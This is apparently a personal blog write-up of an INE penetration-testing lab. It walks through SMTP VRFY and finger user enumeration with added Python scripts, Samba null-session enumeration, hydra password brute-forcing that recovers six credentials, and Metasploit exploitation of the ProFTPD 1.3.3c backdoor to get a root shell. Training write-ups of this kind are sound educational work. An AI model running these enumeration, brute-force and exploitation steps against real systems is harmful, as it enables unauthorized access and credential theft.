February 4, 2022 | 16:04

INE Lab - Linux Remote Exploitation

The scenario is described as follows:

In this lab environment, the user will access a Kali GUI instance. A vulnerable application can be accessed using the tools installed on Kali on:

Dictionaries to use:

  • /usr/share/metasploit-framework/data/wordlists/common_users.txt
  • /usr/share/metasploit-framework/data/wordlists/unix_users.txt

demo.ine.local

TCP port 25 (SMTP) is open:

root@INE:~# nmap -vv -p- -T4 demo.ine.local
[...]
PORT   STATE SERVICE REASON
25/tcp open  smtp    syn-ack ttl 64
MAC Address: 02:42:C0:20:62:03 (Unknown)
[...]

Service detection reports a Postfix smtpd that still advertises the VRFY command in its EHLO reply:

root@INE:~# nmap -sV -sC -p25 -T4 demo.ine.local
[...]
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: demo.ine.local, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
MAC Address: 02:42:C0:20:62:03 (Unknown)
Service Info: Host: demo.ine.local
[...]

Because Postfix answers VRFY with 252 for a mailbox it knows and with 550 (user unknown in local recipient table) otherwise, smtp-user-enum can tell valid accounts from invalid ones:

root@INE:~# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/common_users.txt -t demo.ine.local
[...]
demo.ine.local: administrator exists
demo.ine.local: demo exists
demo.ine.local: rooty exists
demo.ine.local: sysadmin exists
demo.ine.local: anon exists
demo.ine.local: auditor exists
demo.ine.local: diag exists
[...]
root@INE:~# smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t demo.ine.local
[...]
demo.ine.local: anon exists
demo.ine.local: administrator exists
demo.ine.local: backup exists
demo.ine.local: bin exists
demo.ine.local: auditor exists
demo.ine.local: _apt exists
demo.ine.local: daemon exists
demo.ine.local: demo exists
demo.ine.local: games exists
demo.ine.local: gnats exists
demo.ine.local: diag exists
demo.ine.local: irc exists
demo.ine.local: lp exists
demo.ine.local: list exists
demo.ine.local: mail exists
demo.ine.local: man exists
demo.ine.local: news exists
demo.ine.local: nobody exists
demo.ine.local: postmaster exists
demo.ine.local: postfix exists
demo.ine.local: proxy exists
demo.ine.local: root exists
demo.ine.local: ROOT exists
demo.ine.local: rooty exists
demo.ine.local: sync exists
demo.ine.local: sys exists
demo.ine.local: sysadmin exists
demo.ine.local: uucp exists
demo.ine.local: www-data exists
[...]
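What smtp-user-enum does on the wire is a short exchange that is worth seeing spelled out. The script below is an added example for this post, not code from smtp-user-enum, Postfix or the lab: FakePostfix, its user list, its greeting banner and its reply texts are constructed (modelled on Postfix) so that it runs offline, and SocketTransport sends the same lines to a real host. The part that matters is the reply semantics: a 25x code (Postfix uses 252, never 250, for VRFY) means the address is accepted, 550 5.1.1 means the local recipient table has no such user, and 502 means VRFY is disabled, in which case the same loop has to be redone with RCPT TO (smtp-user-enum -M RCPT).

```python
"""SMTP VRFY user enumeration, the exchange behind smtp-user-enum -M VRFY.

Added example for this write-up; not code from smtp-user-enum, Postfix or
the lab. FakePostfix and its data are constructed so the example runs offline.
"""
import re
import socket
from typing import Dict, Iterable, List, Optional, Protocol

# The reply code is the first three digits; "250-" marks a continuation line.
REPLY_CODE = re.compile(r"^(\d{3})[ -]")


class Transport(Protocol):
    def send_line(self, line: str) -> None: ...
    def recv_reply(self) -> str: ...


class SocketTransport:
    """Line transport over TCP; the offline run below never opens one."""

    def __init__(self, host: str, port: int = 25, timeout: float = 5.0) -> None:
        self.sock = socket.create_connection((host, port), timeout=timeout)
        self.rfile = self.sock.makefile("rb")

    def send_line(self, line: str) -> None:
        self.sock.sendall((line + "\r\n").encode("ascii"))

    def recv_reply(self) -> str:
        lines: List[str] = []
        while True:
            raw = self.rfile.readline()
            if not raw:
                raise ConnectionError("server closed the connection")
            line = raw.decode("ascii", errors="replace").rstrip("\r\n")
            lines.append(line)
            if len(line) < 4 or line[3] != "-":   # final line of a multi-line reply
                return "\n".join(lines)


class FakePostfix:
    """Constructed stand-in for the lab's Postfix; replies modelled on Postfix."""

    def __init__(self, users: Iterable[str], vrfy_enabled: bool = True) -> None:
        self.users = {u.lower() for u in users}
        self.vrfy_enabled = vrfy_enabled
        self.pending = ["220 demo.ine.local ESMTP Postfix"]   # greeting banner

    def send_line(self, line: str) -> None:
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            self.pending.append("250 demo.ine.local")
        elif verb == "VRFY" and not self.vrfy_enabled:
            self.pending.append("502 5.5.1 VRFY command is disabled")
        elif verb == "VRFY" and arg.lower() in self.users:
            self.pending.append(f"252 2.0.0 {arg}")          # "cannot VRFY, will accept"
        elif verb == "VRFY":
            self.pending.append(f"550 5.1.1 <{arg}>: Recipient address rejected: "
                                "User unknown in local recipient table")
        elif verb == "QUIT":
            self.pending.append("221 2.0.0 Bye")
        else:
            self.pending.append("502 5.5.2 Error: command not recognized")

    def recv_reply(self) -> str:
        return self.pending.pop(0)


def reply_code(reply: str) -> int:
    m = REPLY_CODE.match(reply)
    if not m:
        raise ValueError(f"malformed SMTP reply: {reply!r}")
    return int(m.group(1))


def vrfy_enumerate(t: Transport, candidates: Iterable[str],
                   helo: str = "kali") -> Dict[str, Optional[bool]]:
    """Return {user: True (exists), False (unknown), None (inconclusive)}.

    25x = address accepted (Postfix says 252), 55x = rejected. Anything else,
    e.g. 502 when VRFY is disabled or a 4xx temporary failure, is inconclusive
    and calls for the RCPT TO method instead.
    """
    if reply_code(t.recv_reply()) != 220:
        raise RuntimeError("no SMTP greeting")
    t.send_line(f"HELO {helo}")
    if reply_code(t.recv_reply()) != 250:
        raise RuntimeError("HELO rejected")
    results: Dict[str, Optional[bool]] = {}
    for user in candidates:
        t.send_line(f"VRFY {user}")
        code = reply_code(t.recv_reply())
        if 250 <= code <= 252:
            results[user] = True
        elif code in (550, 551, 553):
            results[user] = False
        else:
            results[user] = None
    t.send_line("QUIT")
    t.recv_reply()
    return results


if __name__ == "__main__":
    server = FakePostfix(["root", "demo", "sysadmin"])   # constructed user list
    for user, state in vrfy_enumerate(server, ["root", "ghost", "demo"]).items():
        print(user, {True: "exists", False: "unknown", None: "inconclusive"}[state])
```

Against the lab host the call would be vrfy_enumerate(SocketTransport("demo.ine.local"), users). If every result comes back None, the server has VRFY disabled and the result says nothing about the accounts.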

demo2.ine.local

The machine exposes SMB on both 139 (NetBIOS session service) and 445 (direct-hosted):

root@INE:~# nmap -vv -p- -T4 demo2.ine.local
[...]
PORT    STATE SERVICE      REASON
139/tcp open  netbios-ssn  syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64
[...]

It’s Samba, and the version string identifies Ubuntu’s 4.3.11 package. Note as well that guest access is accepted and message signing is not required:

root@INE:~# nmap -sV -sC -p139,445 -T4 demo2.ine.local
[...]
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: RECONLABS)
MAC Address: 02:42:C0:20:62:04 (Unknown)
Service Info: Host: SAMBA-RECON

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SAMBA-RECON, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2022-07-04T14:31:01
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: demo2
|   NetBIOS computer name: SAMBA-RECON\x00
|   Domain name: ine.local
|   FQDN: demo2.ine.local
|_  System time: 2022-07-04T14:31:01+00:00
[...]

The guest account is accepted, and the public share grants anonymous read/write:

root@INE:~# nmap --script smb-enum-shares demo2.ine.local
[...]
Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\192.32.98.4\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (samba.recon.lab)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.32.98.4\aisha: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\aisha
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.32.98.4\emma: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\emma
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.32.98.4\everyone: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\everyone
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.32.98.4\john: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\john
|     Anonymous access: <none>
|     Current user access: <none>
|   \\192.32.98.4\public: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\public
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

There is a flag on the public share:

root@INE:~# smbclient \\\\demo2.ine.local\\public
[...]
smb: \> ls
  .                                   D        0  Mon Jul  4 20:03:13 2022
  ..                                  D        0  Tue Nov 27 19:06:13 2018
  dev                                 D        0  Tue Nov 27 19:06:13 2018
  secret                              D        0  Tue Nov 27 19:06:13 2018
[...]
smb: \> cd dev
smb: \dev\> ls
  .                                   D        0  Tue Nov 27 19:06:13 2018
  ..                                  D        0  Mon Jul  4 20:03:13 2022
[...]
smb: \dev\> cd ..\secret
smb: \secret\> ls
  .                                   D        0  Tue Nov 27 19:06:13 2018
  ..                                  D        0  Mon Jul  4 20:03:13 2022
  flag                                N       33  Tue Nov 27 19:06:13 2018
[...]
smb: \secret\> more flag
03ddb97933e[...]

User enumeration over the same null session (enum4linux -U asks SAMR for the domain users):

root@INE:~# enum4linux -U demo2.ine.local
[...]
 ================================ 
|    Users on demo2.ine.local    |
 ================================ 
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: john     Name:   Desc: 
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elie     Name:   Desc: 
index: 0x3 RID: 0x3ec acb: 0x00000010 Account: aisha    Name:   Desc: 
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: shawn    Name:   Desc: 
index: 0x5 RID: 0x3eb acb: 0x00000010 Account: emma     Name:   Desc: 
index: 0x6 RID: 0x3ed acb: 0x00000010 Account: admin    Name:   Desc:
[...]

Password guessing against the six enumerated accounts; hydra’s -u flag tries each password against all users before moving to the next one, which spreads the attempts across accounts:

root@INE:~# cat >> /tmp/users.txt
admin
john
elie
aisha
shawn
emma
^C
root@INE:~# hydra -L /tmp/users.txt -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt smb://demo2.ine.local -u
[...]
[445][smb] host: demo2.ine.local   login: admin   password: password
[445][smb] host: demo2.ine.local   login: elie   password: 123456
[445][smb] host: demo2.ine.local   login: aisha   password: monkey
[445][smb] host: demo2.ine.local   login: emma   password: abc123
[445][smb] host: demo2.ine.local   login: shawn   password: jennifer
[445][smb] host: demo2.ine.local   login: john   password: password1
1 of 1 target successfully completed, 6 valid passwords found
[...]

With the admin credentials, nmap reports read/write access on every share (the Aftermath section below shows this is only true for public and everyone):

root@INE:~# nmap --script smb-enum-shares --script-args smbusername=admin,smbpassword=password demo2.ine.local
[...]
Host script results:
| smb-enum-shares: 
|   account_used: admin
|   \\192.238.133.4\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (samba.recon.lab)
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.238.133.4\aisha: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\aisha
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\192.238.133.4\emma: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\emma
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\192.238.133.4\everyone: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\everyone
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\192.238.133.4\john: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\john
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\192.238.133.4\public: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\samba\public
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE
[...] 

demo3.ine.local

The target has TCP port 79 open:

root@INE:~# nmap -vv -p- -T4 demo3.ine.local
[...]
PORT   STATE SERVICE REASON
79/tcp open  finger  syn-ack ttl 64
[...]

It’s a Linux fingerd service:

root@INE:~# nmap -sC -sV -p79 demo3.ine.local
[...]
PORT   STATE SERVICE VERSION
79/tcp open  finger  Linux fingerd
|_finger: No one logged on.\x0D
[...]

A quick manual check shows that per-user queries are answered even though nobody is logged on; root is a valid account:

root@INE:~# finger root@demo3.ine.local
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Looping over a user wordlist turns up more accounts; three of them carry a flag in the GECOS field that finger prints as Name:

root@INE:~# for name in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do finger $name@demo3.ine.local | grep -i flag; done
Login: diag                             Name: Flag2 F765F7A0A169F4F6654EE72A84A9EB
Login: gopher                           Name: Flag1 098F6BCD4621D373CADE4E832627B4F6
Login: webmaster                        Name: Flag3 C4CA4238A0B923820DCC509A6F75849B
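The loop above relies on grep to spot the flags. As an added example (not the lab’s code and not finger-user-enum’s), here is a small parser for the finger reply format: it splits the Key: value columns into a dict, pulls flag-like tokens out of the Name field, and returns nothing for an unknown user. The sample replies are constructed from the field values shown on this page, with the unknown-user message modelled on bsd-finger’s; finger_query speaks RFC 1288 to a real host but is not called by the offline run.

```python
"""Parse finger(1) replies and extract flag-like tokens from the GECOS name.

Added example for this write-up, not code from the lab or finger-user-enum.
Sample replies are constructed from the values shown in the post.
"""
import re
import socket
from typing import Dict, List, Optional

COLUMN_SPLIT = re.compile(r"\s{2,}")                 # GNU finger pads columns with spaces
FIELD = re.compile(r"^([A-Za-z][A-Za-z ]*?):\s*(.*)$")  # "Key: value", key may have a space
FLAG = re.compile(r"\bFlag\d+\s+([0-9A-Fa-f]{16,})")  # "Flag2 F765..." as seen on this host

SAMPLE_ROOT = (
    "Login: root                             Name: root\r\n"
    "Directory: /root                        Shell: /bin/bash\r\n"
    "Never logged in.\r\nNo mail.\r\nNo Plan.\r\n"
)
SAMPLE_DIAG = (
    "Login: diag                             Name: Flag2 F765F7A0A169F4F6654EE72A84A9EB\r\n"
    "Directory: /home/diag                   Shell: /bin/bash\r\n"
    "Office: 353, 567-537-1198               Home Phone: 410-364-2969\r\n"
    "Never logged in.\r\nNo mail.\r\nNo Plan.\r\n"
)
SAMPLE_UNKNOWN = "finger: ghost: no such user.\r\n"   # constructed, bsd-finger wording


def parse_finger(reply: str) -> Optional[Dict[str, str]]:
    """Return the Key -> value fields of one reply, or None if it names no account."""
    fields: Dict[str, str] = {}
    status: List[str] = []
    for raw in reply.splitlines():
        line = raw.strip()
        if not line:
            continue
        # A value containing two or more consecutive spaces would be split here;
        # GNU finger's own output does not do that.
        for column in COLUMN_SPLIT.split(line):
            m = FIELD.match(column)
            if m:
                fields[m.group(1)] = m.group(2).strip()
            else:
                status.append(column)           # "Never logged in.", "No Plan.", ...
    if "Login" not in fields:                   # "finger: x: no such user." has no Login
        return None
    fields["_status"] = "; ".join(status)
    return fields


def extract_flags(reply: str) -> List[str]:
    info = parse_finger(reply)
    return FLAG.findall(info.get("Name", "")) if info else []


def finger_query(host: str, user: str, timeout: float = 5.0) -> str:
    """RFC 1288 query: send "<user>\\r\\n" to port 79, read until the server closes."""
    with socket.create_connection((host, 79), timeout=timeout) as s:
        s.sendall(f"{user}\r\n".encode("ascii"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def enumerate_flags(replies: Dict[str, str]) -> Dict[str, List[str]]:
    """Map login -> flags for every reply that describes an account with a flag."""
    return {user: flags for user, reply in replies.items()
            if (flags := extract_flags(reply))}


if __name__ == "__main__":
    offline = {"root": SAMPLE_ROOT, "diag": SAMPLE_DIAG, "ghost": SAMPLE_UNKNOWN}
    print(enumerate_flags(offline))
```

Against the live host the dict would be built as {name: finger_query("demo3.ine.local", name) for name in wordlist}; the rest is unchanged.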

demo4.ine.local

There is a ProFTPD version 1.3.3c running on demo4.ine.local:

root@INE:~# nmap -vv -p- -T4 demo4.ine.local
[...]
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 64
[...]
root@INE:~# nmap -sC -sV -p21 -T4 demo4.ine.local
[...]
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
MAC Address: 02:42:C0:EE:85:06 (Unknown)
Service Info: OS: Unix
[...]

ProFTPD 1.3.3c is the release whose source tarball was replaced with a backdoored copy on the project’s distribution server in late 2010; a build from that tarball hands a root shell to anyone who sends the trigger string as a HELP argument, which is exactly what the Metasploit module does:

msf6 > use exploit/unix/ftp/proftpd_133c_backdoor
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts demo4.ine.local
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/bind_perl
msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit

The shell runs as root, and /etc/passwd holds nothing beyond the stock system accounts:

id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Aftermath

In this section I note where the official solution walkthrough takes a different approach.

Overall Scanning

We could have scanned all the targets at once. Without -p- this run covers only nmap’s default top 1000 ports, which is enough here because every service found earlier sits on a well-known port:

root@INE:~# cat >> targets
demo.ine.local
demo2.ine.local
demo3.ine.local
demo4.ine.local
^C
root@INE:~# nmap -iL targets --open
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-05 21:44 IST
Nmap scan report for demo.ine.local (192.238.133.3)
Host is up (0.0000090s latency).
rDNS record for 192.238.133.3: target-1
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
25/tcp open  smtp
MAC Address: 02:42:C0:EE:85:03 (Unknown)

Nmap scan report for demo2.ine.local (192.238.133.4)
Host is up (0.0000090s latency).
rDNS record for 192.238.133.4: target-2
Not shown: 998 closed tcp ports (reset)
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 02:42:C0:EE:85:04 (Unknown)

Nmap scan report for demo3.ine.local (192.238.133.5)
Host is up (0.0000090s latency).
rDNS record for 192.238.133.5: target-3
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
79/tcp open  finger
MAC Address: 02:42:C0:EE:85:05 (Unknown)

Nmap scan report for demo4.ine.local (192.238.133.6)
Host is up (0.0000090s latency).
rDNS record for 192.238.133.6: target-4
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
MAC Address: 02:42:C0:EE:85:06 (Unknown)

Nmap done: 4 IP addresses (4 hosts up) scanned in 0.30 seconds

demo.ine.local

Metasploit can also be used to enumerate users on the SMTP server:

msf6 > use auxiliary/scanner/smtp/smtp_enum
msf6 auxiliary(scanner/smtp/smtp_enum) > set rhosts demo.ine.local
msf6 auxiliary(scanner/smtp/smtp_enum) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf6 auxiliary(scanner/smtp/smtp_enum) > exploit

demo2.ine.local

As an alternative to nmap’s smb-enum-shares script, smbmap can be used to list the available shares with permissions:

root@INE:~# smbmap -H demo2.ine.local
[+] Guest session       IP: demo2.ine.local:445 Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        public                                                  READ, WRITE
        john                                                    NO ACCESS
        aisha                                                   NO ACCESS
        emma                                                    NO ACCESS
        everyone                                                NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (samba.recon.lab)

While nmap reports every share as READ/WRITE for admin, smbmap reports the personal shares john, aisha and emma as READ ONLY, with only public and everyone writable:

root@INE:~# smbmap -H demo2.ine.local -u admin -p password
[+] IP: demo2.ine.local:445     Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        public                                                  READ, WRITE
        john                                                    READ ONLY
        aisha                                                   READ ONLY
        emma                                                    READ ONLY
        everyone                                                READ, WRITE
        IPC$                                                    NO ACCESS       IPC Service (samba.recon.lab)

smbclient agrees with smbmap; an upload to john is denied:

root@INE:~# smbclient //demo2.ine.local/john --user=admin%password
[...]
smb: \> put test.txt 
NT_STATUS_ACCESS_DENIED opening remote file \test.txt

rpcclient over the same null session (-U "" -N) gives the user list with RIDs, plus groups and per-user details:

root@INE:~# rpcclient -U "" -N demo2.ine.local
rpcclient $> enumdomusers
user:[john] rid:[0x3e8]
user:[elie] rid:[0x3ea]
user:[aisha] rid:[0x3ec]
user:[shawn] rid:[0x3e9]
user:[emma] rid:[0x3eb]
user:[admin] rid:[0x3ed]
rpcclient $> enumdomgroups
group:[Maintainer] rid:[0x3ee]
group:[Reserved] rid:[0x3ef]
rpcclient $> enumdomains
name:[SAMBA-RECON] idx:[0x0]
name:[Builtin] idx:[0x1]
rpcclient $> queryuser john
        User Name   :   john
        Full Name   :
        Home Drive  :   \\samba-recon\john
        Dir Drive   :
        Profile Path:   \\samba-recon\john\profile
        Logon Script:
        Description :
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Thu, 01 Jan 1970 05:30:00 IST
        Logoff Time              :      Wed, 06 Feb 2036 20:36:39 IST
        Kickoff Time             :      Wed, 06 Feb 2036 20:36:39 IST
        Password last set Time   :      Tue, 27 Nov 2018 19:06:12 IST
        Password can change Time :      Tue, 27 Nov 2018 19:06:12 IST
        Password must change Time:      Thu, 14 Sep 30828 08:18:05 IST
        unknown_2[0..31]...
        user_rid :      0x3e8
        group_rid:      0x201
        acb_info :      0x00000010
        fields_present: 0x00ffffff
        logon_divs:     168
        bad_password_count:     0x00000000
        logon_count:    0x00000000
        padding1[0..7]...
        logon_hrs[0..21]...

demo3.ine.local

There’s also a Metasploit module that enumerates users via the Finger service:

msf6 > use auxiliary/scanner/finger/finger_users
msf6 auxiliary(scanner/finger/finger_users) > set rhosts demo3.ine.local
msf6 auxiliary(scanner/finger/finger_users) > exploit

finger-user-enum.pl gives the same result; the sed in the pipeline only breaks the tab-separated output into lines, and each pair of dots in the output is where a CR LF of the raw finger reply was rendered as non-printable:

root@INE:~/Desktop/tools/finger-user-enum# ./finger-user-enum.pl -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t demo3.ine.local -v | grep -i flag | sed 's/\t\t*/\n/g'
diag@demo3.ine.local: Login: diag           
Name: Flag2 F765F7A0A169F4F6654EE72A84A9EB..Directory: /home/diag               
Shell: /bin/bash..Office: 353, 567-537-1198
Home Phone: 410-364-2969..Never logged in...No mail...No Plan...
gopher@demo3.ine.local: Login: gopher         
Name: Flag1 098F6BCD4621D373CADE4E832627B4F6..Directory: /home/gopher             
Shell: /bin/bash..Office: 5423, 954-540-8052
Home Phone: 423-553-2085..Never logged in...No mail...No Plan...
webmaster@demo3.ine.local: Login: webmaster      
Name: Flag3 C4CA4238A0B923820DCC509A6F75849B..Directory: /home/webmaster          
Shell: /bin/bash..Office: 65, 318-240-8507
Home Phone: 608-848-1401..Never logged in...No mail...No Plan...

demo4.ine.local

The solution walkthrough uses nmap’s vuln scripts to find the backdoor. Note that ftp-proftpd-backdoor is not a passive check: it sends the trigger and runs a command as root on the target (id by default, changeable via the ftp-proftpd-backdoor.cmd script argument), so a --script vuln run is already code execution on the host:

root@INE:~# nmap --script vuln -p21 demo4.ine.local
[...]
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-proftpd-backdoor: 
|   This installation has been backdoored.
|   Command: id
|_  Results: uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
[...]

© Pavel Pi 2021
